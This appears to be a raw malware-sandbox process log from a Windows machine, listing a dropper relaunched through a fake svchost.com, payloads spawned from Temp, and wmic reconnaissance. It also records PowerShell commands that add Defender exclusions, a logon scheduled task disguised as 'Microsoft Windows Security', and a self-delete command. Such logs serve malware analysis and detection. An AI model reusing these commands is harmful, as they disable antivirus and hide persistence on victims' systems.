C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\3058827245.exe

C:\Users\Admin\AppData\Local\Temp\3058827245.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\PING.EXE

ping localhost

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe"

C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe

C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe"

C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe

C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe"

C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe

C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE

C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE

C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Users\Admin\AppData\Local\Temp\Files\soft.exe

"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"

C:\Windows\svchost.com

